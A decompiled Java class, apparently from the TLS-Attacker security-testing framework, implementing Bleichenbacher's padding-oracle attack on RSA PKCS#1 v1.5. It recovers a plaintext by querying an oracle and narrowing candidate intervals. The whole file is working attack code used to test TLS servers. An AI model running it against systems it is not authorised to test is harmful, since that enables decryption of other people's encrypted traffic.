/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.pkcs1;

import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.attacks.pkcs1.Interval;
import de.rub.nds.tlsattacker.attacks.pkcs1.OracleException;
import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1Attack;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.Pkcs1Oracle;
import de.rub.nds.tlsattacker.util.MathHelper;
import java.math.BigInteger;
import java.util.ArrayList;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

/**
 * Adaptive chosen-ciphertext attack that recovers an RSA PKCS#1 plaintext by
 * repeatedly asking an oracle whether a modified ciphertext is PKCS conforming.
 *
 * <p>{@link #attack()} runs the four phases named in its log output: blinding
 * (step 1), searching for a conforming multiplier {@code si} (step 2),
 * narrowing the set of candidate intervals {@link #m} (step 3) and checking
 * whether a single value is left (step 4).
 *
 * <p>The members {@code c0}, {@code bigB}, {@code publicKey}, {@code oracle},
 * {@code encryptedMsg}, {@code solution} and {@code prepareMsg(...)} are not
 * declared in this class; they are presumably inherited from
 * {@link Pkcs1Attack} (NOTE(review): confirm against the superclass).
 */
public class Bleichenbacher
extends Pkcs1Attack {
    private static final Logger LOGGER = LogManager.getLogger();
    /** Multiplier found in step 1 ({@code 1} when step 1 is skipped). */
    protected BigInteger s0;
    /** Multiplier currently being tested / most recently accepted by the oracle. */
    protected BigInteger si;
    /** Candidate intervals that may still contain the (blinded) plaintext. */
    protected Interval[] m;
    /** When {@code true}, step 1 (blinding) is skipped. */
    protected final boolean msgIsPKCS;

    /**
     * Creates the attack and derives {@code bigB} from the modulus size.
     *
     * @param msg            encrypted message handed to the superclass
     * @param pkcsOracle     oracle handed to the superclass
     * @param msgPKCScofnorm {@code true} if {@code msg} is to be treated as
     *                       already PKCS conforming, which skips the blinding step
     */
    public Bleichenbacher(byte[] msg, Pkcs1Oracle pkcsOracle, boolean msgPKCScofnorm) {
        super(msg, pkcsOracle);
        this.msgIsPKCS = msgPKCScofnorm;
        this.c0 = BigInteger.ZERO;
        this.si = BigInteger.ZERO;
        this.m = null;
        // bigB = 2^(8 * (k - 2)); k is presumably the modulus length in bytes
        // (assumes MathHelper.intceildiv is a ceiling division - TODO confirm).
        int modulusBytes = MathHelper.intceildiv(this.publicKey.getModulus().bitLength(), 8);
        this.bigB = BigInteger.ONE.shiftLeft((modulusBytes - 2) * 8);
    }

    /**
     * Runs the complete attack and returns once {@code stepFour} reports a
     * solution; the result is stored in {@code solution}.
     *
     * @throws OracleException       if thrown while querying the oracle
     * @throws IllegalStateException if no candidate interval is left (raised by
     *                               {@link #stepTwo(int)})
     */
    public void attack() throws OracleException {
        LOGGER.info("Step 1: Blinding");
        if (this.msgIsPKCS) {
            LOGGER.info("Step skipped --> Message is considered as PKCS compliant.");
            LOGGER.info("Testing the validity of the original message");
            // The oracle's answer is not evaluated here; the query is still issued.
            this.oracle.checkPKCSConformity(this.encryptedMsg);
            this.s0 = BigInteger.ONE;
            this.c0 = new BigInteger(1, this.encryptedMsg);
            this.m = this.initialInterval();
        } else {
            this.stepOne();
        }

        int i = 1;
        boolean solutionFound = false;
        while (!solutionFound) {
            LOGGER.info("Step 2: Searching for PKCS conforming messages.");
            this.stepTwo(i);
            LOGGER.info("Step 3: Narrowing the set of solutions.");
            this.stepThree(i);
            LOGGER.info("Step 4: Computing the solution.");
            solutionFound = this.stepFour(i);
            ++i;
            LOGGER.info("// Total # of queries so far: {}", this.oracle.getNumberOfQueries());
        }
    }

    /**
     * Step 1: increments {@link #si} (starting from its current value) until
     * the message prepared from the original ciphertext and {@code si} is
     * accepted by the oracle, then records {@code c0}, {@link #s0} and the
     * initial interval.
     *
     * @throws OracleException if thrown while querying the oracle
     */
    protected void stepOne() throws OracleException {
        BigInteger ciphered = new BigInteger(1, this.encryptedMsg);
        byte[] send;
        do {
            this.si = this.si.add(BigInteger.ONE);
            send = this.prepareMsg(ciphered, this.si);
        } while (!this.oracle.checkPKCSConformity(send));
        this.c0 = new BigInteger(1, send);
        this.s0 = this.si;
        this.m = this.initialInterval();
        LOGGER.debug(" Found s0 : {}", this.si);
    }

    /**
     * Step 2: dispatches to step 2a (first iteration), 2b (two or more
     * intervals) or 2c (exactly one interval).
     *
     * @param i iteration counter, {@code 1} for the first iteration
     * @throws OracleException       if thrown while querying the oracle
     * @throws IllegalStateException if {@code i != 1} and no interval is left;
     *                               without this check the surrounding loop in
     *                               {@link #attack()} would spin forever without
     *                               issuing any further oracle query
     */
    protected void stepTwo(int i) throws OracleException {
        if (i == 1) {
            this.stepTwoA();
        } else if (i > 1 && this.m.length >= 2) {
            this.stepTwoB();
        } else if (this.m.length == 1) {
            this.stepTwoC();
        } else if (this.m.length == 0) {
            throw new IllegalStateException(
                    "No candidate interval left; the attack cannot make progress"
                            + " (the oracle may have returned an inconsistent answer)");
        }
        LOGGER.debug(" Found s{}: {}", i, this.si);
    }

    /**
     * Step 2a: starts at {@code n / (3 * bigB)} rounded up and increments
     * {@link #si} until the oracle accepts the prepared message.
     *
     * @throws OracleException if thrown while querying the oracle
     */
    protected void stepTwoA() throws OracleException {
        BigInteger n = this.publicKey.getModulus();
        LOGGER.debug("Step 2a: Starting the search");
        this.si = divideRoundingUp(n, BigInteger.valueOf(3L).multiply(this.bigB));
        while (!this.oracle.checkPKCSConformity(this.prepareMsg(this.c0, this.si))) {
            this.si = this.si.add(BigInteger.ONE);
        }
    }

    /**
     * Step 2b: continues the linear search from the value after the current
     * {@link #si} until the oracle accepts the prepared message.
     *
     * @throws OracleException if thrown while querying the oracle
     */
    private void stepTwoB() throws OracleException {
        LOGGER.debug("Step 2b: Searching with more than one interval left");
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while (!this.oracle.checkPKCSConformity(this.prepareMsg(this.c0, this.si)));
    }

    /**
     * Step 2c: with a single interval {@code m[0]} left, derives a counter
     * {@code ri} from the current {@link #si} and scans the multipliers between
     * the bounds computed for {@code ri}; when the upper bound is passed,
     * {@code ri} is incremented and the scan restarts at the new lower bound.
     *
     * @throws OracleException if thrown while querying the oracle
     */
    protected void stepTwoC() throws OracleException {
        BigInteger n = this.publicKey.getModulus();
        LOGGER.debug("Step 2c: Searching with one interval left");

        // ri = 2 * (m[0].upper * si - 2 * bigB) / n, using the previous si
        BigInteger ri = this.si.multiply(this.m[0].upper)
                .subtract(BigInteger.valueOf(2L).multiply(this.bigB))
                .multiply(BigInteger.valueOf(2L))
                .divide(n);

        BigInteger upperBound = this.step2cComputeUpperBound(ri, n, this.m[0].lower);
        BigInteger lowerBound = this.step2cComputeLowerBound(ri, n, this.m[0].upper);

        // One below the lower bound, because the loop increments before it queries.
        this.si = lowerBound.subtract(BigInteger.ONE);
        do {
            this.si = this.si.add(BigInteger.ONE);
            if (this.si.compareTo(upperBound) > 0) {
                // Range for this ri is exhausted: move on to the next ri.
                ri = ri.add(BigInteger.ONE);
                upperBound = this.step2cComputeUpperBound(ri, n, this.m[0].lower);
                this.si = this.step2cComputeLowerBound(ri, n, this.m[0].upper);
            }
        } while (!this.oracle.checkPKCSConformity(this.prepareMsg(this.c0, this.si)));
    }

    /**
     * Step 3: replaces {@link #m} by the intervals that remain possible given
     * the accepted multiplier {@link #si}. For every old interval and every
     * {@code r} in the range given by the step-3 bounds, the candidate
     * {@code [(2B + r*n) / si rounded up, (3B - 1 + r*n) / si]} is clipped to
     * the old interval and kept if it is non-empty.
     *
     * @param i iteration counter, used for logging only
     */
    private void stepThree(int i) {
        BigInteger n = this.publicKey.getModulus();
        BigInteger twoB = BigInteger.valueOf(2L).multiply(this.bigB);
        BigInteger threeBMinusOne = BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE);
        ArrayList<Interval> narrowed = new ArrayList<Interval>();

        for (Interval interval : this.m) {
            BigInteger rMax = this.step3ComputeUpperBound(this.si, n, interval.upper);
            BigInteger rMin = this.step3ComputeLowerBound(this.si, n, interval.lower);
            for (BigInteger r = rMin; r.compareTo(rMax) <= 0; r = r.add(BigInteger.ONE)) {
                BigInteger rTimesN = r.multiply(n);
                BigInteger newLower = divideRoundingUp(twoB.add(rTimesN), this.si).max(interval.lower);
                BigInteger newUpper = threeBMinusOne.add(rTimesN).divide(this.si).min(interval.upper);
                if (newLower.compareTo(newUpper) <= 0) {
                    narrowed.add(new Interval(newLower, newUpper));
                }
            }
        }

        LOGGER.debug(" # of intervals for M{}: {}", i, narrowed.size());
        this.m = narrowed.toArray(new Interval[0]);
    }

    /**
     * Step 4: if exactly one interval is left and its bounds coincide, stores
     * {@code s0^-1 * m[0].upper mod n} in {@code solution}.
     *
     * @param i iteration counter (unused)
     * @return {@code true} if the solution was computed, {@code false} otherwise
     */
    private boolean stepFour(int i) {
        if (this.m.length != 1 || this.m[0].lower.compareTo(this.m[0].upper) != 0) {
            return false;
        }
        BigInteger n = this.publicKey.getModulus();
        // Undo the multiplier s0 chosen in step 1.
        this.solution = this.s0.modInverse(n).multiply(this.m[0].upper).mod(n);
        LOGGER.info("====> Solution found!\n {}", ArrayConverter.bytesToHexString(this.solution.toByteArray()));
        return true;
    }

    /**
     * Upper bound for {@code r} in step 3:
     * {@code (upperIntervalBound * s - 2 * bigB) / modulus}, rounded up.
     */
    private BigInteger step3ComputeUpperBound(BigInteger s, BigInteger modulus, BigInteger upperIntervalBound) {
        BigInteger numerator = upperIntervalBound.multiply(s)
                .subtract(BigInteger.valueOf(2L).multiply(this.bigB));
        return divideRoundingUp(numerator, modulus);
    }

    /**
     * Lower bound for {@code r} in step 3:
     * {@code (lowerIntervalBound * s - 3 * bigB + 1) / modulus}, truncated.
     */
    private BigInteger step3ComputeLowerBound(BigInteger s, BigInteger modulus, BigInteger lowerIntervalBound) {
        return lowerIntervalBound.multiply(s)
                .subtract(BigInteger.valueOf(3L).multiply(this.bigB))
                .add(BigInteger.ONE)
                .divide(modulus);
    }

    /**
     * Lower bound for the multiplier in step 2c:
     * {@code (2 * bigB + r * modulus) / upperIntervalBound}, truncated.
     *
     * @param r                  current value of the step-2c counter
     * @param modulus            RSA modulus
     * @param upperIntervalBound upper bound of the single remaining interval
     * @return the first multiplier to test for this {@code r}
     */
    protected BigInteger step2cComputeLowerBound(BigInteger r, BigInteger modulus, BigInteger upperIntervalBound) {
        return BigInteger.valueOf(2L).multiply(this.bigB)
                .add(r.multiply(modulus))
                .divide(upperIntervalBound);
    }

    /**
     * Upper bound for the multiplier in step 2c:
     * {@code (3 * bigB + r * modulus) / lowerIntervalBound}, truncated.
     *
     * @param r                  current value of the step-2c counter
     * @param modulus            RSA modulus
     * @param lowerIntervalBound lower bound of the single remaining interval
     * @return the last multiplier to test for this {@code r}
     */
    protected BigInteger step2cComputeUpperBound(BigInteger r, BigInteger modulus, BigInteger lowerIntervalBound) {
        return BigInteger.valueOf(3L).multiply(this.bigB)
                .add(r.multiply(modulus))
                .divide(lowerIntervalBound);
    }

    /** Builds the starting interval set {@code { [2 * bigB, 3 * bigB - 1] }}. */
    private Interval[] initialInterval() {
        BigInteger lower = BigInteger.valueOf(2L).multiply(this.bigB);
        BigInteger upper = BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE);
        return new Interval[]{new Interval(lower, upper)};
    }

    /**
     * Returns the truncated quotient {@code dividend / divisor}, plus one
     * whenever the remainder is non-zero (a ceiling for non-negative operands).
     */
    private static BigInteger divideRoundingUp(BigInteger dividend, BigInteger divisor) {
        BigInteger[] quotientAndRemainder = dividend.divideAndRemainder(divisor);
        if (quotientAndRemainder[1].signum() != 0) {
            return quotientAndRemainder[0].add(BigInteger.ONE);
        }
        return quotientAndRemainder[0];
    }
}

